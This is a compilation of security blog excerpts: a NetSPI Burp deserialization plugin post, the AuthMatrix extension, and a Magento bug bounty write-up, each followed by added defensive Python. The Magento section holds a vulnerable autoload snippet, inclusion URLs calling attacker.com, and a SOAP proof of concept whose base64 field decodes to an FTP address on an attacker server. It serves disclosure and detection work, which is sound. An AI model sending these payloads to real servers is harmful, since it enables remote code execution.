We now have our command in a serialized object in the request. Pressing the Go button will send the request off and show the response on the right hand side. If you prefer to use Repeater, you can send it to that too.

If you want to try another payload, simply select the new payload and hit serialize again. As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly.

Conclusion

I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/Burp-Extensions/releases). You will need to be running Java 8 for it to work.

Source: https://blog.netspi.com/java-deserialization-attacks-burp/
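A defender-side counterpart to the traffic the post proxies through Burp, added here as an example and not code from the post, from ysoserial or from the Java Serial Killer extension: it locates a Java serialization stream in an HTTP body (raw, or base64-encoded as it often travels in form fields), parses the stream header and the first class descriptor to recover the class name, and compares that name against a denylist of package prefixes before the body is handed to a deserializer. The sample bodies and the class names in them are constructed for the example; the single denylist prefix `org.apache.commons.collections.` is an assumption chosen because the post names Commons-Collections 3.1 as the target of the CommonsCollections1 payload.

```python
import base64
import re
import struct

# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 5
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70

# Example denylist (an assumption for this example): package prefixes a
# deserialization gateway refuses when they appear in the leading descriptor.
DENYLIST_PREFIXES = ("org.apache.commons.collections.",)


def find_java_stream(body: bytes):
    """Return the serialized stream embedded in an HTTP body, or None.

    Handles raw bodies and bodies carrying the stream as base64
    (base64 of AC ED 00 05 always begins with 'rO0AB').
    """
    idx = body.find(STREAM_MAGIC)
    if idx != -1:
        return body[idx:]
    m = re.search(rb"rO0AB[A-Za-z0-9+/=]+", body)
    if m:
        try:
            return base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError
            return None
    return None


def first_class_name(stream: bytes):
    """Parse header + TC_OBJECT + TC_CLASSDESC and return the class name.

    Only the leading descriptor is read. Java writes names as modified
    UTF-8, which coincides with UTF-8 for the ASCII names seen in practice.
    """
    if len(stream) < 8 or stream[:4] != STREAM_MAGIC:
        return None
    if stream[4] != TC_OBJECT or stream[5] != TC_CLASSDESC:
        return None
    (length,) = struct.unpack(">H", stream[6:8])
    name = stream[8:8 + length]
    if len(name) != length:         # truncated stream
        return None
    return name.decode("utf-8", errors="replace")


def assess_body(body: bytes, denylist=DENYLIST_PREFIXES):
    """Classify an HTTP body as not serialized, allowed, or blocked."""
    stream = find_java_stream(body)
    if stream is None:
        return {"serialized": False, "class": None, "verdict": "pass"}
    name = first_class_name(stream)
    if name is None:
        return {"serialized": True, "class": None, "verdict": "block-unparseable"}
    if name.startswith(tuple(denylist)):
        return {"serialized": True, "class": name, "verdict": "block-denylisted"}
    return {"serialized": True, "class": name, "verdict": "allow"}


def make_stream(class_name: str) -> bytes:
    """Build a minimal stream for a Serializable class with no fields (constructed test data)."""
    name = class_name.encode("utf-8")
    return (STREAM_MAGIC
            + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name
            + b"\x00" * 8                       # serialVersionUID (arbitrary here)
            + b"\x02"                           # classDescFlags: SC_SERIALIZABLE
            + b"\x00\x00"                       # field count: 0
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))  # no annotations, no superclass


def sample_bodies():
    """Constructed HTTP bodies: the post's State object raw, a base64-wrapped
    stream naming a denylisted package, and a body with no stream at all."""
    return {
        "raw": b"POST body: " + make_stream("State"),
        "b64": b"data=" + base64.b64encode(make_stream("org.apache.commons.collections.Example")),
        "plain": b"nothing here",
    }


if __name__ == "__main__":
    for label, body in sample_bodies().items():
        print(label, assess_body(body))
```

The check is deliberately cheap: it inspects only the outermost class descriptor, which is enough to refuse bodies whose entry class sits in a package the application never expects to deserialize, and it blocks anything that carries the magic but cannot be parsed, since a malformed stream has no legitimate reason to reach the endpoint.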
22. Heartbleed is the only attack that is simple, "reliable" and useful at the same time. Some details about DROWN here: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html
23. AuthMatrix for Burp Suite – Web Authorisation Testing Tool

AuthMatrix is a web authorisation testing tool built as an extension to Burp Suite that provides a simple way to test authorisation in web applications and web services. With AuthMatrix, testers focus on thoroughly defining tables of users, roles, and requests for their specific target application upfront. These tables are displayed through the UI in a similar format to that of an access control matrix commonly built in various threat modelling methodologies.

Once the tables have been assembled, testers can use the simple click-to-run interface to efficiently run all combinations of roles and requests. Testers can then confirm their results with an easy to read, color-coded interface indicating any authorisation vulnerabilities detected in the system. Additionally, the extension provides the ability to save and load target configurations for simple regression testing.

Usage

1. Create users that fit these various roles and check all roles that the user belongs to. If a user is part of multiple roles, check each role individually.
2. From another area of Burp Suite (i.e. Target tab, Repeater tab, etc.) right click a request and select "Send to AuthMatrix." This will create a new item in the second table of the interface. Multiple requests can be added all at once by selecting several requests from within the Target tab.
3. In the second table of AuthMatrix, check all roles that are authorised to make each request.
4. Create a regex based on the expected response behavior of the request to determine if the action has succeeded. Common regexes include HTTP response headers, success messages within the body, or other variations within the body of the page.
5. Generate session tokens for each user via a web browser or the Repeater tab and enter them into the correct field within the first table.
6. Click Run to run all requests, or right click several messages and select run.
7. Observe that the adjacent table will show color-coded results, red indicating the request did not return expected results and may indicate a vulnerability.

You can download AuthMatrix here: AuthMatrix.py

Or read more here.

Source: http://www.darknet.org.uk/2016/03/authmatrix-for-burp-suite-web-authorisation-testing-tool/
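The users/roles/requests matrix from the usage steps above, run offline as an added example that is not AuthMatrix's own code: each user carries a role set and a session token, each request carries the roles allowed to perform it plus the success regex from step 4, and the run marks every cell where the observed outcome contradicts the expectation. The target application is a constructed stub (`fake_server`) with one deliberate flaw, and every user, role, path and token in it is made up for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class User:
    name: str
    roles: set
    token: str            # session token obtained by logging in as this user


@dataclass
class Request:
    method: str
    path: str
    allowed_roles: set    # roles expected to succeed
    success_regex: str    # matches the response only when the action succeeded


# Constructed stub standing in for the target application. Its access rules
# contain one deliberate flaw: DELETE under /admin/ only checks for a session.
_SESSIONS = {"tok-admin": "admin", "tok-editor": "editor", "tok-guest": "guest"}


def fake_server(req: Request, token: str) -> str:
    role = _SESSIONS.get(token)
    if role is None:
        return "HTTP/1.1 302 Found\r\nLocation: /login\r\n\r\n"
    if req.path.startswith("/admin/"):
        if req.method == "DELETE":          # the flaw: no role check here
            return 'HTTP/1.1 200 OK\r\n\r\n{"deleted": true}'
        if role != "admin":
            return "HTTP/1.1 403 Forbidden\r\n\r\n"
    if req.path.startswith("/articles") and req.method == "POST" and role == "guest":
        return "HTTP/1.1 403 Forbidden\r\n\r\n"
    return 'HTTP/1.1 200 OK\r\n\r\n{"ok": true}'


def run_matrix(users, requests, send=fake_server):
    """Return one (user, request, status) tuple per cell of the matrix.

    expected: the user holds at least one role allowed for the request.
    observed: the success regex matched the response.
    observed and not expected is the authorisation bypass case; expected and
    not observed usually means a stale token or a wrong regex, not a bug.
    """
    results = []
    for u in users:
        for r in requests:
            expected = bool(u.roles & r.allowed_roles)
            observed = re.search(r.success_regex, send(r, u.token)) is not None
            if observed and not expected:
                status = "VULNERABLE"
            elif expected and not observed:
                status = "UNEXPECTED_FAILURE"
            else:
                status = "OK"
            results.append((u.name, f"{r.method} {r.path}", status))
    return results


def findings(results):
    """Only the cells that indicate an authorisation bypass."""
    return [(u, req) for u, req, status in results if status == "VULNERABLE"]


def demo_run():
    """Constructed matrix: three live sessions and one expired one."""
    users = [User("alice", {"admin"}, "tok-admin"),
             User("bob", {"editor"}, "tok-editor"),
             User("carol", {"guest"}, "tok-guest"),
             User("dave", {"editor"}, "tok-expired")]
    requests = [Request("GET", "/articles", {"admin", "editor", "guest"}, r"^HTTP/1\.1 200"),
                Request("POST", "/articles", {"admin", "editor"}, r"^HTTP/1\.1 200"),
                Request("GET", "/admin/users", {"admin"}, r"^HTTP/1\.1 200"),
                Request("DELETE", "/admin/users/42", {"admin"}, r'"deleted": true')]
    return run_matrix(users, requests)


if __name__ == "__main__":
    for row in demo_run():
        print(row)
```

The expired session for dave is included on purpose: his expected-success cells all fail, which is the "unexpected failure" colour in a real run and is the cue to refresh a token or tighten a regex before reading any red cell as a vulnerability.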
  24. Attacking The XNU Kernel In El Capitain
25. Hacking Magento eCommerce For Fun And 17.000 USD

Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities.

In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded 2,500$ for the very same finding…

A couple of months later, in February 2015, there were a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to the Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I'd never thought I'd receive: 8,000$ and 9,000$.
Both of the vulnerabilities were discovered in February 2015; however, I decided to report only a "potential Remote Code Execution" at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low to be eligible for the bug bounty program; in other words, I thought it wasn't a "real" security issue. I was wrong (again!)…

• Autoloaded File Inclusion in SOAP API (CVE-2015-6497)

There is a class of vulnerabilities that might affect certain PHP applications which use an "exploitable" autoloading mechanism. The "Autoloading Classes" feature was introduced in PHP 5.0 with the magic function __autoload(), which is automatically called when your code references a class or interface that hasn't been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition.

While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely.

There are multiple ways to trigger the autoloader; the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list:

class_exists()
interface_exists()
method_exists()
property_exists()
is_subclass_of()
…

So, when user-controlled input (tainted data) enters one of these sensitive sinks there's a chance for the application to be vulnerable to an "Autoloaded File Inclusion" attack.

Let's see a simple example of vulnerable code:

    /* Some code... */

    function __autoload($class_name)
    {
        include $class_name . '.php';
    }

    if(isset($_GET['class']) && class_exists($_GET['class']))
    {
        $myObject = new $_GET['class'];
    }
    else
    {
        die('No class found');
    }

    /* Some code... */

In this example an attacker controls a class name via the GET parameter "class", which is first used with the class_exists() function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these:

http://example.com/vuln.php?class=http://attacker.com/shell
http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file

In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located in the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the class name's prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code.

According to the official PHP documentation "a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores". That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed class autoloaders to be invoked with invalid class names.
This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that's probably one of the reasons why Magento's security engineers have undervalued this issue.

Magento Vulnerability

The vulnerability in Magento is caused by the code that handles the "catalogProductCreate" SOAP API call. The vulnerable code is located in the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script:

    public function create($type, $set, $sku, $productData, $store = null)
    {
        if (!$type || !$set || !$sku) {
            $this->_fault('data_invalid');
        }

        $this->_checkProductTypeExists($type);
        $this->_checkProductAttributeSet($set);

        /** @var $product Mage_Catalog_Model_Product */
        $product = Mage::getModel('catalog/product');

        $product->setStoreId($this->_getStoreId($store))
            ->setAttributeSetId($set)
            ->setTypeId($type)
            ->setSku($sku);

        if (!property_exists($productData, 'stock_data')) {
            //Set default stock_data if not exist in product data
            $_stockData = array('use_config_manage_stock' => 0);
            $product->setStockData($_stockData);
        }

This method expects the $productData parameter to be an array (in the form of a stdClass object) and uses the property_exists() function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in the form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there's only one autoloader function registered, that is the Varien_Autoload::autoload() method:

    public function autoload($class)
    {
        if ($this->_collectClasses) {
            $this->_arrLoadedClasses[self::$_scope][] = $class;
        }
        if ($this->_isIncludePathDefined) {
            $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class;
        } else {
            $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class)));
        }
        $classFile.= '.php';
        //echo $classFile;die();
        return include $classFile;
    }

In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the $productData parameter from the SOAP request, which, after some replacements and a ".php" string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code.

There are some conditions which should be met to exploit this vulnerability:

- an API user account with privileges to create a catalog product is required;
- in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process;
- in order to include arbitrary files from remote locations the "allow_url_include" directive must be set to On;
- in case the "allow_url_include" directive is set to Off it might still be possible to include files from remote locations using the ssh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging the expect:// wrapper (which requires the Expect extension to be installed).

NOTE: if Magento is running on a PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243).
Proof of Concept

A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability:

    POST /magento/index.php/api/v2_soap HTTP/1.0
    Host: localhost
    Content-Length: 804
    Connection: close

    <?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Magento" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
    <ns1:catalogProductCreate>
    <sessionId xsi:type="xsd:string">VALID_SESSION</sessionId>
    <type xsi:type="xsd:string">simple</type>
    <set xsi:type="xsd:string">4</set>
    <sku xsi:type="xsd:string">test</sku>
    <productData xsi:type="xsd:base64Binary">ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData>
    <storeView xsi:nil="true"/>
    </ns1:catalogProductCreate>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

The "productData" parameter has been encoded in base64 within the SOAP request, and the decoded string is the following:

    ftp://attacker:password@attacker_server.com/home/attacker/evil

This means that, leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from an FTP server under their control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution.

Responsible Disclosure Timeline

As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable.
The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following:

    We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report.

On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more before getting their reply on August 25:

    Hello Egidio,

    Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000.

I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015.

• Information Disclosure in RSS Feed (CVE-2016-2212)

After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered: “Why don’t I try to report this as well? Maybe I’m missing something and I wrongly believe this isn’t a real security issue”.
Actually I was missing something crucial: the fact that, leveraging this vulnerability, a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!!

I reported this vulnerability on October 29, 2015, including a Proof of Concept code and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day:

    Hello Egidio,

    Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers.

After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team had released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171”. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016:

    Hello Egidio,

    Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000.

I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update: the SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you?
Conclusion

Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progress. However, what really disappoints me is that my vulnerabilities seem to be quite critical, especially considering they’re the only two classes of security bugs they’re willing to pay up to $10,000 for under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and under-evaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never notice their advisories with my name and the vulnerabilities I reported, and never claim my bounties for such findings?

This entry was posted on March 3, 2016

Source: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd
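Detection logic for the request shape the post describes, added here as an editor's example; it is not code from the advisory, from karmainsecurity.com or from Magento. The post states that a string sent in the SOAP productData parameter reaches the autoloader as a class name, so the script parses a captured catalogProductCreate request, base64-decodes productData when it is typed as xsd:base64Binary, and reports any scalar value along with the reasons it cannot be a legitimate class name (stream wrapper scheme, path characters, NULL byte). The first sample reuses the post's own base64 payload; the second, benign request with a structured productData is constructed for contrast, and the child element names in it are illustrative assumptions.

```python
"""Flag catalogProductCreate SOAP requests whose productData is a bare string.
Added example, not from the advisory or Magento. Sample requests are
constructed; SAMPLE_REQUEST reuses the base64 payload shown in the post."""
import base64
import re
import xml.etree.ElementTree as ET

XSI_TYPE = "{http://www.w3.org/2001/XMLSchema-instance}type"
# Any "scheme://" prefix: covers the ftp://, ssh2.sftp:// and expect:// wrappers named in the post.
WRAPPER_RE = re.compile(r"^([a-z][a-z0-9.+-]*)://", re.I)
# What a PHP class name looks like by the time the autoloader receives it.
CLASS_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# Captured request as raw HTTP text (constructed; payload taken from the post).
SAMPLE_REQUEST = b"""POST /magento/index.php/api/v2_soap HTTP/1.0
Host: localhost
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Magento" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:catalogProductCreate>
<sessionId xsi:type="xsd:string">VALID_SESSION</sessionId>
<type xsi:type="xsd:string">simple</type>
<set xsi:type="xsd:string">4</set>
<sku xsi:type="xsd:string">test</sku>
<productData xsi:type="xsd:base64Binary">ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData>
<storeView xsi:nil="true"/>
</ns1:catalogProductCreate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# Constructed benign call: productData is a structure, which is what the API expects.
# The child element names are illustrative assumptions, not Magento's WSDL.
BENIGN_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Magento" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:catalogProductCreate>
<sessionId xsi:type="xsd:string">VALID_SESSION</sessionId>
<type xsi:type="xsd:string">simple</type>
<set xsi:type="xsd:string">4</set>
<sku xsi:type="xsd:string">test</sku>
<productData>
<name xsi:type="xsd:string">Test product</name>
<price xsi:type="xsd:string">9.99</price>
</productData>
<storeView xsi:nil="true"/>
</ns1:catalogProductCreate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def _local(tag):
    """Strip the namespace part of an ElementTree tag ('{urn:Magento}x' -> 'x')."""
    return tag.rsplit("}", 1)[-1]


def soap_body(raw):
    """Return the XML body of a raw HTTP request; pass bare XML through unchanged."""
    raw = raw.replace(b"\r\n", b"\n")
    if raw.lstrip().startswith(b"<"):
        return raw
    return raw.split(b"\n\n", 1)[-1]


def product_data(raw):
    """Locate productData inside catalogProductCreate.
    Returns ("struct", None) when it has child elements, ("scalar", text) when it
    is a bare value (base64-decoded if typed xsd:base64Binary), or (None, None)."""
    root = ET.fromstring(soap_body(raw))
    call = next((e for e in root.iter() if _local(e.tag) == "catalogProductCreate"), None)
    if call is None:
        return None, None
    pd = next((e for e in call.iter() if _local(e.tag) == "productData"), None)
    if pd is None:
        return None, None
    if len(pd):
        return "struct", None
    text = (pd.text or "").strip()
    if pd.get(XSI_TYPE, "").endswith("base64Binary"):
        try:
            text = base64.b64decode(text, validate=True).decode("utf-8", "replace")
        except ValueError:
            pass  # keep the undecodable value; a scalar is reported either way
    return "scalar", text


def classify(value):
    """List the reasons a scalar productData value cannot be a legitimate class name."""
    findings = []
    if "\x00" in value:
        findings.append("null byte")  # the pre-5.3.4 path truncation the post mentions
    m = WRAPPER_RE.match(value)
    if m:
        findings.append("stream wrapper: " + m.group(1).lower())
    if "/" in value or "\\" in value or ".." in value:
        findings.append("path characters")
    if not CLASS_NAME_RE.match(value):
        findings.append("not a class name")
    return findings


def inspect_request(raw):
    """Verdict for one request: any scalar productData is reported, with its
    decoded value and the reasons, because the API expects a structure there."""
    shape, value = product_data(raw)
    if shape != "scalar":
        return {"suspicious": False, "shape": shape, "findings": []}
    return {"suspicious": True, "shape": shape, "value": value, "findings": classify(value)}


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, inspect_request(req))
```

Run over a feed of captured API requests, the verdict for the post's sample decodes the payload back to the ftp:// URL and names the wrapper; a scalar that does look like a class name is still reported, since it only ever reaches the autoloader because the call was given a string instead of product data.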